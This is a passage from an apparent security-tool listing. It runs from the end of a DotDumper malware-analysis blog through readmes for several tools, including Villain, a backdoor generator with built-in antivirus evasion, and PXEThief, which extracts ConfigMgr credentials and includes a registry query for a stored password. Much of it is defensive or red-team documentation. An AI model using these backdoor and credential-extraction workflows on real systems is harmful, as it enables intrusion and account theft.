Unless a directory name is provided, the β€œ-log” folder name is set equal to the file name of the sample without the extension (if any). The folder is created in the same directory as DotDumper, and it is where the logs and dumped files will be saved.

In the case of a library, or an alternative entry point into a binary, one must override the entry point using β€œ-overrideEntry true”. Additionally, one has to provide the fully qualified class name, which includes the namespace, using β€œ-fqcn My.NameSpace.MyClass”. This tells DotDumper which class to select, from which the provided function name (using β€œ-functionName MyFunction”) is retrieved.

If the selected function requires arguments, one has to provide the number of arguments using β€œ-argc”. The argument types and values are to be provided as β€œstring|myValue int|9”. Note that when spaces are used in the values, the argument on the command-line interface needs to be encapsulated between quotes to ensure it is passed as a single argument.
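
To illustrate the β€œtype|value” convention, below is a minimal Python sketch of how such argument specifications can be parsed. DotDumper itself is written in C#, and the converter list here is an assumption covering only a few native types:

def parse_argument(spec):
    """Parse a 'type|value' specification such as 'string|myValue' or 'int|9'."""
    type_name, _, raw_value = spec.partition("|")
    converters = {
        "string": str,
        "int": int,
        "char": lambda s: s[0],
        "bool": lambda s: s.lower() == "true",
    }
    return converters[type_name](raw_value)

# parse_argument("string|myValue") -> 'myValue'; parse_argument("int|9") -> 9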

Other less frequently used options such as β€œ-raceTime” or β€œ-deprecated” are safe in their default settings but might require tweaking in the future due to changes in the DotNet Framework. They are currently exposed in the command-line interface to easily allow changes, if need be, even if one is using an older version of DotDumper when the time comes.

Logging and dumping

Logging and dumping are the two core features of DotDumper. To minimize the amount of time the analysis takes, the logging should provide context to the analyst. This is done by providing the analyst with the following information for each logged function call:

  • A stack trace based on the function’s caller
  • Information regarding the assembly object where the call originated from, such as the name, version, and cryptographic hashes
  • The parent assembly, from which the call originates if it is not the original sample
  • The type, name, and value of the function’s arguments
  • The type, name, and value of function’s return value, if any
  • A list of files which are dumped to disk which correspond with the given function call

Note that for each dumped file, the file name is equal to the file’s SHA-256 hash.

To clarify the above, an excerpt of a log is given below. The excerpt shows the details for the aforementioned AgentTesla sample, where it loads the second stage using DotNet’s Assembly.Load function.

First, the local system time is given, together with the original function’s return type, name, and argument(s). Second, the stack trace is given, where it shows that the sample’s main function leads to a constructor, initialises the components, and calls two custom functions. The Assembly.Load function was called from within β€œNavigationLib.TaskEightBestOil.GGGGGGGGGGGGGGGGGGGG(String str)”. This provides context for the analyst to find the code around this call if it is of interest.

Then, information regarding the assembly call order is given. The more stages are loaded, the more complex it becomes to see via which stages the call came to be. One normally expects one stage to load the next, but in some cases later stages utilize previous stages in a non-linear order. Additionally, information regarding the originating assembly is given to further enrich the data for the analyst.

Next, the parent hash is given. The parent of a stage is the previous stage, which in this example is not yet present. The newly loaded stage will have this stage as its parent. This allows the analyst to correlate events more easily.

Finally, the function’s return type and value are stored, along with the type, name, and value of each argument that is passed to the hooked function. If any variable is larger than 100 bytes in size, it is stored on the disk instead. A reference is then inserted in the log to reference the file, rather than showing the value. The threshold has been set to avoid hiccups in the printing of the log, as some arrays are thousands of indices in size.
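
The dump-or-log decision described above can be summarized in a short Python sketch (the real implementation is C#; the 100-byte threshold and SHA-256 file naming follow this section, while the function itself is hypothetical):

import hashlib
import os

def render_value(value, dump_dir, threshold=100):
    """Return the text to write into the log: the value itself or a file reference."""
    if len(value) <= threshold:
        return repr(value)
    digest = hashlib.sha256(value).hexdigest()    # dumped files are named by SHA-256 hash
    with open(os.path.join(dump_dir, digest), "wb") as fh:
        fh.write(value)
    return "<dumped to file %s>" % digest         # the log references the file instead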

Reflection

Per Microsoft’s documentation, reflection is best summarized as β€œ[…] provides objects that encapsulate assemblies, modules, and types”. In short, this allows the dynamic creation and invocation of DotNet classes and functions from the malware sample. DotDumper contains a reflective loader which allows an analyst to load and analyze both executables and libraries, as long as they are DotNet Framework based.

To utilize the loader, one has to opt to overwrite the entry point in the command-line interface, specify the class (including the namespace it resides in) and function name within a given file. Optionally, one can provide arguments to the specified function, for all native types and arrays thereof. Examples of native types are int, string, char, and arrays such as int[], string[], and char[]. All the arguments are to be provided via the command-line interface, where both the type and the value are to be specified.

Not overriding the entry point results in the default entry point being used. By default, an empty string array is passed towards the sample’s main function, as if the sample is executed without arguments. Additionally, reflection is often used by loaders to invoke a given function in a given class in the next stage. Sometimes, arguments are passed along as well, which are used later to decrypt a resource. In the aforementioned AgentTesla sample, this exact scenario plays out. DotDumper’s invoke related hooks log these occurrences, as can be seen below.

The function name in the first line is not an internal function of the DotNet Framework, but rather a call to a specific function in the second stage. The types and names of the three arguments are listed in the function signature. Their values can be found in the function argument information section. This would allow an analyst to load the second stage in a custom loader with the given values for the arguments, or even do this using DotDumper by loading the previously dumped stage and providing the arguments.

Managed hooks

Before going into managed hooks, one needs to understand how hooks work. There are two main variables to consider here: the target function and a controlled function which is referred to as the hook. Simply put, the memory at the target function (i.e. Assembly.Load) is altered to instead jump to the hook. As such, the program’s execution flow is diverted. The hook can then perform arbitrary actions, optionally call the original function, after which it returns the execution to the caller together with a return value if need be. The diagram below illustrates this process.

Knowing what hooks are is essential to understand what managed hooks are. Managed code is executed in a virtual and managed environment, such as the DotNet runtime or Java’s virtual machine. Obtaining the memory address where the managed function resides differs from an unmanaged language such as C. Once the correct memory addresses for both functions have been obtained, the hook can be set by directly accessing memory using unsafe C#, along with DotNet’s interoperability service to call native Windows API functionality.
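
The control flow of a hook (divert execution, act, optionally call the original, return to the caller) can be illustrated with a simple Python analogy. Note that this is only an analogy: Python lets us swap a function reference, whereas DotDumper patches the memory of the compiled managed function as described above.

import functools

def install_hook(module, name):
    """Replace module.<name> with a wrapper that logs calls and still invokes the original."""
    original = getattr(module, name)
    @functools.wraps(original)
    def hook(*args, **kwargs):
        print(f"[hook] {name} called with args={args}")   # arbitrary pre-call actions
        result = original(*args, **kwargs)                # optionally call the original
        print(f"[hook] {name} returned {result!r}")
        return result                                     # hand execution back to the caller
    setattr(module, name, hook)

# Example: install_hook(base64, "b64decode") logs every call to base64.b64decode.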

Easily extendible

Since DotDumper is written in pure C# without any external dependencies, one can easily extend the framework using Visual Studio. The code is documented in this blog, on GitHub, and in classes, in functions, and in-line in the source code. This, in combination with the clear naming scheme, allows anyone to modify the tool as they see fit, minimizing the time and effort that one needs to spend to understand the tool. Instead, it allows developers and analysts alike to focus their efforts on the tool’s improvement.

Differences with known tooling

With the goal and features of DotDumper clear, it might seem as if there’s overlap with known publicly available tools such as ILSpy, dnSpyEx, de4dot, or pe-sieve. Note that there is no intention to proclaim one tool is better than another, but rather how the tools differ.

DotDumper’s goal is to log and dump crucial, contextualizing, and common function calls from DotNet targeting samples. ILSpy is a DotNet disassembler and decompiler, but does not allow the execution of the file. dnSpyEx (and its predecessor dnSpy) utilise ILSpy as the disassembler and decompiler component, while adding a debugger. This allows one to manually inspect and manipulate memory. de4dot is solely used to deobfuscate DotNet binaries, improving the code’s readability for human eyes. The last tool in this comparison, pe-sieve, is meant to detect and dump malware from running processes, disregarding the used programming language. The table below provides a graphical overview of the above-mentioned tools.

Future work

DotDumper is under constant review and development, all of which is focused on two main areas of interest: bug fixing and the addition of new features. During the development, the code was tested, but due to injection of hooks into the DotNet Framework’s functions which can be subject to change, it’s very well possible that there are bugs in the code. Anyone who encounters a bug is urged to open an issue on the GitHub repository, which will then be looked at. The suggestion of new features is also possible via the GitHub repository. For those with a GitHub account, or for those who rather not publicly interact, feel free to send me a private message on my Twitter.

Needless to say, if you've used DotDumper during an analysis, or used it in a creative way, feel free to reach out in public or in private! There’s nothing like hearing about the usage of a home-made tool!

There is more in store for DotDumper, and an update will be sent out to the community once it is available!



SimpleRmiDiscoverer 0.1

SimpleRmiDiscoverer is a JMX RMI scanning tool for unsecured (without enabled authentication) instances of Java JMX. It does not use standard Java RMI/JMX classes like other available tools, but rather communicates directly over TCP. The tool is written in Java and is very useful in red teaming operations because the JVM is still ubiquitous in corporate environments. It can be executed by unprivileged (non-admin) users.

Faraday 4.3.2

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

ExchangeFinder - Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version


ExchangeFinder is a simple and open-source tool that tries to find Microsoft Exchange instances for a given domain based on the top common DNS names for Microsoft Exchange.

ExchangeFinder can identify the exact version of Microsoft Exchange starting from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019.


How does it work?

ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange server, then it will send a couple of HTTP requests to parse the content of the response sent by the server to identify if it's using Microsoft Exchange or not.

Currently, the tool has a signature for every Microsoft Exchange version from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019, and based on the build version sent by Exchange via the X-OWA-Version header, we can identify the exact version.
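
The flow described above can be approximated in a few lines of Python. This is a hedged sketch, not the tool's code; the subdomain list is an illustrative subset, and the real tool also inspects MX records and response content:

import requests

COMMON_SUBDOMAINS = ["mail", "autodiscover", "owa", "exchange"]  # illustrative subset

def probe_exchange(domain):
    """Yield (url, build) pairs where an X-OWA-Version header was returned."""
    for sub in COMMON_SUBDOMAINS:
        url = f"https://{sub}.{domain}/owa/"
        try:
            resp = requests.get(url, timeout=5, allow_redirects=True)
        except requests.RequestException:
            continue
        build = resp.headers.get("X-OWA-Version")
        if build:                      # the build number maps to an exact Exchange version
            yield url, build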

If the tool found a valid Microsoft Exchange instance, it will return the following results:

  • Domain name.
  • Microsoft Exchange version.
  • Login page.
  • Web server version.

Installation & Requirements

Clone the latest version of ExchangeFinder using the following command:

git clone https://github.com/mhaskar/ExchangeFinder

And then install all the requirements using the command poetry install.

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/Desktop/ExchangeFinder]
└─$ poetry install
Installing dependencies from lock file


Package operations: 15 installs, 0 updates, 0 removals

β€’ Installing pyparsing (3.0.9)
β€’ Installing attrs (22.1.0)
β€’ Installing certifi (2022.6.15)
β€’ Installing charset-normalizer (2.1.1)
β€’ Installing idna (3.3)
β€’ Installing more-itertools (8.14.0)
β€’ Installing packaging (21.3)
β€’ Installing pluggy (0.13.1)
β€’ Installing py (1.11.0)
β€’ Installing urllib3 (1.26.12)
β€’ Installing wcwidth (0.2.5)
β€’ Installing dnspython (2.2.1)
β€’ Installing pytest (5.4.3)
β€’ Installing requests (2.28.1)
β€’ Installing termcolor (1.1.0)
Installing the current project: ExchangeFinder (0.1.0)

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/Desktop/ExchangeFinder]

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/Desktop/ExchangeFinder]
└─$ python3 exchangefinder.py


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[-] Please use --domain or --domains option

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/Desktop/ExchangeFinder]
└─$

Usage

You can use the option -h to show the help banner:

Scan single domain

To scan single domain you can use the option --domain like the following:

askarβ€’/opt/redteaming/ExchangeFinder(main⚑)Β» python3 exchangefinder.py --domain dummyexchangetarget.com                                                                                           


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[!] Scanning domain dummyexchangetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.

[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://autodiscover.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

askarβ€’/opt/redteaming/ExchangeFinder(main⚑)Β»

Scan multiple domains

To scan multiple domains (targets) you can use the option --domains and choose a file like the following:

askarβ€’/opt/redteaming/ExchangeFinder(main⚑)Β» python3 exchangefinder.py --domains domains.txt                                                                                                          


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records found for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.

[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.

[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5

askarβ€’/opt/redteaming/ExchangeFinder(main⚑)Β»

Please note that the examples used in the screenshots are resolved in the lab only.

This tool is very simple, and I was using it to save some time while searching for Microsoft Exchange instances. Feel free to open a PR if you find any issue or have something new to add.

License

This project is licensed under the GPL-3.0 License - see the LICENSE file for details



Villain - Windows And Linux Backdoor Generator And Multi-Session Handler That Allows Users To Connect With Sibling Servers And Share Their Backdoor Sessions


Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.

The main idea behind the payloads generated by this tool is inherited from HoaxShell. One could say that Villain is an evolved, steroid-induced version of it.

This is an early release currently being tested.
If you are having detection issues, watch this video on how to bypass signature-based detection

Video Presentation

[2022-11-30] Recent & awesome, made by John Hammond -> youtube.com/watch?v=pTUggbSCqA0
[2022-11-14] Original release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ

Disclaimer: Running the payloads generated by this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.


Installation & Usage

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

You should run as root:

Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

For more information about using Villain check out the Usage Guide.

Important Notes

  1. Villain has a built-in auto-obfuscate payload function to assist users in bypassing AV solutions (for Windows payloads). As a result, payloads are undetected (for the time being).
  2. Each generated payload is going to work only once. An already used payload cannot be reused to establish a session.
  3. The communication between sibling servers is AES encrypted, using the recipient sibling server's ID as the encryption key and the first 16 bytes of the local server's ID as the IV. During the initial connection handshake of two sibling servers, each server's ID is exchanged in clear text, meaning that the handshake could be captured and used to decrypt traffic between sibling servers. I know it's "weak" that way. It's not supposed to be super secure, as this tool was designed to be used during penetration testing / red team assessments, for which this encryption schema should be enough (a sketch of the schema follows this list).
  4. Villain instances connected with each other (sibling servers) must be able to directly reach each other as well. I intend to add a network route mapping utility so that sibling servers can use one another as a proxy to achieve cross network communication between them.
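
Below is a minimal Python sketch of the encryption schema described in note 3, using pycryptodome. Only the key/IV derivation follows the note; the mode of operation and key length are assumptions not stated above:

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

def encrypt_for_sibling(plaintext, recipient_id, local_id):
    key = recipient_id[:32]                      # key: recipient sibling server's ID (length assumed)
    iv = local_id[:16]                           # IV: first 16 bytes of the local server's ID
    cipher = AES.new(key, AES.MODE_CBC, iv=iv)   # CBC mode is an assumption
    return cipher.encrypt(pad(plaintext, AES.block_size))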

Approach

A few notes about the http(s) beacon-like reverse shell approach:

Limitations

  • A backdoor shell is going to hang if you execute a command that initiates an interactive session. For more information read this.

Advantages

  • When it comes to Windows, the generated payloads can run even in PowerShell Constrained Language Mode.
  • The generated payloads can run even by users with limited privileges.

Contributions

Pull requests are generally welcome. Please keep in mind: I am constantly working on new offsec tools as well as maintaining several existing ones. I rarely accept pull requests, because I either have a plan for the course of a project or I judge that the foreign code would be hard to test and/or maintain. It doesn't have to do with how good or bad an idea is; it's just too much work, and also, I am kind of developing all these tools to learn myself.

There are parts of this project that were removed before publishing because I considered them to be buggy or hard to maintain (at this early stage). If you have an idea for an addition that comes with a significant chunk of code, I suggest you first contact me to discuss if there's something similar already in the making, before making a PR.



SQLMAP - Automatic SQL Injection Tool 1.7

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.

ModSecurity Backdoor Tool

Proof of concept remote command execution and file retrieval backdoor script for ModSecurity.

PXEThief - Set Of Tooling That Can Extract Passwords From The Operating System Deployment Functionality In Microsoft Endpoint Configuration Manager


PXEThief is a set of tooling that implements attack paths discussed at the DEF CON 30 talk Pulling Passwords out of Configuration Manager (https://forum.defcon.org/node/241925) against the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager (or ConfigMgr, still commonly known as SCCM). It allows for credential gathering from configured Network Access Accounts (https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) and any Task Sequence Accounts or credentials stored within ConfigMgr Collection Variables that have been configured for the "All Unknown Computers" collection. These Active Directory accounts are commonly overpermissioned and allow for privilege escalation to administrative access somewhere in the domain, at least in my personal experience.

Likely, the most serious attack that can be executed with this tooling would involve PXE-initiated deployment being supported for "All unknown computers" on a distribution point without a password, or with a weak password. The overpermissioning of ConfigMgr accounts exposed to OSD mentioned earlier can then allow for a full Active Directory attack chain to be executed with only network access to the target environment.


Usage Instructions

python pxethief.py -h 
pxethief.py 1 - Automatically identify and download encrypted media file using DHCP PXE boot request. Additionally, attempt exploitation of blank media password when auto_exploit_blank_password is set to 1 in 'settings.ini'
pxethief.py 2 <IP Address of DP Server> - Coerce PXE Boot against a specific MECM Distribution Point server designated by IP address
pxethief.py 3 <variables-file-name> <Password-guess> - Attempt to decrypt a saved media variables file (obtained from PXE, bootable or prestaged media) and retrieve sensitive data from MECM DP
pxethief.py 4 <variables-file-name> <policy-file-path> <password> - Attempt to decrypt a saved media variables file and Policy XML file retrieved from a stand-alone TS media
pxethief.py 5 <variables-file-name> - Print the hash corresponding to a specified media variables file for cracking in Hashcat
pxethief.py 6 <identityguid> <identitycert-file-name> - Retrieve task sequences using the values obtained from registry keys on a DP
pxethief.py 7 <Reserved1-value> - Decrypt stored PXE password from SCCM DP registry key (reg query HKLM\software\microsoft\sms\dp /v Reserved1)
pxethief.py 8 - Write new default 'settings.ini' file in PXEThief directory
pxethief.py 10 - Print Scapy interface table to identify interface indexes for use in 'settings.ini'
pxethief.py -h - Print PXEThief help text

pxethief.py 5 <variables-file-name> should be used to generate a 'hash' of a media variables file that can be used for password guessing attacks with the Hashcat module published at https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module.

Configuration Options

A file contained in the main PXEThief folder is used to set more static configuration options. These are as follows:

[SCAPY SETTINGS]
automatic_interface_selection_mode = 1
manual_interface_selection_by_id =

[HTTP CONNECTION SETTINGS]
use_proxy = 0
use_tls = 0

[GENERAL SETTINGS]
sccm_base_url =
auto_exploit_blank_password = 1

Scapy settings

  • automatic_interface_selection_mode will attempt to determine the best interface for Scapy to use automatically, for convenience. It does this using two main techniques. If set to 1, it will attempt to use the interface that can reach the machine's default gateway as the output interface. If set to 2, it will look for the first interface that it finds that has an IP address that is not an autoconfigured or localhost IP address. This will fail to select the appropriate interface in some scenarios, which is why you can force the use of a specific interface with 'manual_interface_selection_by_id'.
  • manual_interface_selection_by_id allows you to specify the integer index of the interface you want Scapy to use. The ID to use in this file should be obtained from running pxethief.py 10.

General settings

  • sccm_base_url is useful for overriding the Management Point that the tooling will speak to. This is useful if DNS does not resolve (so the value read from the media variables file cannot be used) or if you have identified multiple Management Points and want to send your traffic to a specific one. This should be provided in the form of a base URL e.g. http://mp.configmgr.com instead of mp.configmgr.com or http://mp.configmgr.com/stuff.
  • auto_exploit_blank_password changes the behaviour of pxethief 1 to automatically attempt to exploit a non-password protected PXE Distribution Point. Setting this to 1 will enable auto exploitation, while setting it to 0 will print the tftp client string you should use to download the media variables file. Note that almost all of the time you will want this set to 1, since non-password protected PXE makes use of a binary key that is sent in the DHCP response that you receive when you ask the Distribution Point to perform a PXE boot.
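
A minimal Python sketch of reading these options with configparser (the section and key names come from the file above; how PXEThief actually loads them is not shown here):

import configparser

config = configparser.ConfigParser()
config.read("settings.ini")

scapy = config["SCAPY SETTINGS"]
general = config["GENERAL SETTINGS"]

auto_mode = scapy.getint("automatic_interface_selection_mode", fallback=1)
manual_id = scapy.get("manual_interface_selection_by_id", fallback="")
base_url = general.get("sccm_base_url", fallback="")
auto_exploit = general.getboolean("auto_exploit_blank_password", fallback=True)

if manual_id:                 # a manual interface index overrides automatic selection
    interface_index = int(manual_id)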

HTTP Connection Settings

Not implemented in this release

Setup Instructions

  1. Create a new Windows VM
  2. Install Python (From https://www.python.org/ or through the store, both should work fine)
  3. Install all the requirements through pip (pip install -r requirements.txt)
  4. Install Npcap (https://npcap.com/#download) (or Wireshark, which comes bundled with it) for Scapy
  5. Bridge the VM to the network running a ConfigMgr Distribution Point set up for PXE/OSD
  6. If using pxethief.py 1 or pxethief.py 2 to identify and generate a media variables file, make sure the interface used by the tool is set to the correct one; if it is not, manually set it in 'settings.ini' by identifying the right index ID to use from pxethief.py 10

Limitations

  • Proxy support for HTTP requests - Currently only configurable in code. Proxy support can be enabled on line 35 of pxethief.py and the address of the proxy can be set on line 693. I am planning to move this feature to be configurable in 'settings.ini' in the next update to the code base
  • HTTPS and mutual TLS support - Not implemented at the moment. Can use an intercepting proxy to handle this though, which works well in my experience; to do this, you will need to configure a proxy as mentioned above
  • Linux support - PXEThief currently makes use of pywin32 in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt to get it to run under Linux

Proof of Concept note

Expect to run into issues with error handling with this tool; there are subtle nuances with everything in ConfigMgr and while I have improved the error handling substantially in preparation for the tool's release, this is in no way complete. If there are edge cases that fail, make a detailed issue or fix it and make a pull request :) I'll review these to see where reasonable improvements can be made. Read the code/watch the talk and understand what is going on if you are going to run it in a production environment. Keep in mind the licensing terms - i.e. use of the tool is at your own risk.

Related work

Identifying and retrieving credentials from SCCM/MECM Task Sequences - In this post, I explain the entire flow of how ConfigMgr policies are found, downloaded and decrypted after a valid OSD certificate is obtained. I also want to highlight the first two references in this post as they show very interesting offensive SCCM research that is ongoing at the moment.

DEF CON 30 Slides - Link to the talk slides

Author Credit

Copyright (C) 2022 Christopher Panayi, MWR CyberSec



GNUnet P2P Framework 0.19.1

GNUnet is a peer-to-peer framework with a focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service built on top of the framework is anonymous file sharing.

Subparse - Modular Malware Analysis Artifact Collection And Correlation Framework


Subparse is a modular framework developed by Josh Strochein, Aaron Baker, and Odin Bernstein. The framework is designed to parse and index malware files and present the information found during parsing in a searchable web-viewer. The framework is modular, making use of a core parsing engine, parsing modules, and a variety of enrichers that add additional information to the malware indices. The main input values for the framework are directories of malware files, which the core parsing engine or a user-specified parsing engine parses before adding additional information from any user-specified enrichment engine, all before indexing the parsed information into an Elasticsearch index. The information gathered can then be searched and viewed via a web-viewer, which also allows filtering on any value gathered from any file. There are currently 3 default parsing modules (ELFParser, OLEParser and PEParser) and 4 enrichment modules (ABUSEEnricher, CAPEEnricher, STRINGEnricher and YARAEnricher).


Getting Started

Software Requirements

To get started using Subparse there are a few required/recommended programs that need to be installed and set up before trying to work with our software.

Software       Status        Link
Docker         Required      Installation Guide
Python 3.8.1   Required      Installation Guide
Pyenv          Recommended   Installation Guide

Additional Requirements

After getting the required/recommended software installed to your system there are a few other steps that need to be taken to get Subparse installed.


Python Requirements
Subparse depends on some additional Python packages for its processes. To complete the Python setup, navigate to the location of your Subparse installation and go to the *parser* folder, then run the following commands to install the requirements:
sudo apt-get install build-essential
pip3 install -r ./requirements.txt

Docker Requirements
Since Subparse uses Docker for its backend and web interface, the Docker containers need to be set up before the program can be used. To do this, navigate to the root directory of the Subparse installation location and use the following command to set up the Docker instances:
docker-compose up

Note: This might take a little time due to downloading the images and setting up the containers that will be needed by Subparse.


Installation steps


Usage

Command Line Options

Command line options that are available for subparse/parser/subparse.py:

Argument             Alternative                    Required   Description
-h                   --help                         No         Shows help menu
-d SAMPLES_DIR       --directory SAMPLES_DIR        Yes        Directory of samples to parse
-e ENRICHER_MODULES  --enrichers ENRICHER_MODULES   No         Enricher modules to use for additional parsing
-r                   --reset                        No         Reset/delete all data in the configured Elasticsearch cluster
-v                   --verbose                      No         Display verbose command-line output
-s                   --service-mode                 No         Enters service mode, allowing more samples to be added to SAMPLES_DIR while processing

Viewing Results

To view the results from Subparse's parsers, navigate to localhost:8080. If you are having trouble viewing the site, make sure that you have the container started up in Docker and that there is not another process running on port 8080 that could cause the site to not be available.


General Information Collected

Before any parser is executed, general information is collected about the sample regardless of the underlying file type (a collection sketch follows the list). This information includes:

  • MD5 hash of the sample
  • SHA256 hash of the sample
  • Sample name
  • Sample size
  • Extension of sample
  • Derived extension of sample
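
A minimal Python sketch of this collection step; the derived extension is assumed to come from content inspection (for example via a library such as python-magic), which is elided here:

import hashlib
import os

def collect_general_info(path):
    # File-type-agnostic metadata matching the fields listed above.
    with open(path, "rb") as f:
        data = f.read()
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "name": os.path.basename(path),
        "size": len(data),
        "extension": os.path.splitext(path)[1].lstrip("."),
        # "derived_extension" would come from magic-byte inspection (assumption).
    }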

Parser Modules

Parsers are ONLY executed on samples that match the file type. For example, PE files will by default have the PEParser executed against them, because their file type corresponds to those the PEParser is able to examine.

Default Modules


ELFParser
This is the default parsing module that will be executed against ELF files. Information that is collected:
  • General Information
  • Program Headers
  • Section Headers
  • Notes
  • Architecture Specific Data
  • Version Information
  • Arm Unwind Information
  • Relocation Data
  • Dynamic Tags

OLEParser
This is the default parsing module that will be executed against OLE and RTF formatted files; it uses the OLETools package to obtain data. The information that is collected:
  • Meta Data
  • MRaptor
  • RTF
  • Times
  • Indicators
  • VBA / VBA Macros
  • OLE Objects

PEParser
This is the default parsing module that will be executed against PE files that match or include the file types: PE32 and MS-Dos. Information that is collected:
  • Section code and count
  • Entry point
  • Image base
  • Signature
  • Imports
  • Exports


Enricher Modules

These modules are optional modules that will ONLY get executed if specified via the -e | --enrichers flag on the command line.

Default Modules


ABUSEEnricher
This enricher uses the [Abuse.ch](https://abuse.ch/) API and [Malware Bazaar](https://bazaar.abuse.ch) to collect more information about the sample(s) Subparse is analyzing; the information is then aggregated and stored in the Elastic database. A lookup sketch follows this list.
CAPEEnricher
This enricher is used to communicate with a CAPEv2 Sandbox instance to collect more information about the sample(s) through dynamic analysis; the information is then aggregated and stored in the Elastic database, utilizing the Kafka Messaging Service for background processing.
STRINGEnricher
This enricher is a smart string enricher that will parse the sample for potentially interesting strings. The categories of strings that this enricher looks for include: Audio, Images, Executable Files, Code Calls, Compressed Files, Work (Office Docs.), IP Addresses, IP Address + Port, Website URLs, Command Line Arguments.
YARAEnricher
This enricher uses a pre-compiled yara file located at: parser/src/enrichers/yara_rules. This pre-compiled file includes rules from VirusTotal and the YaraRulesProject.
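
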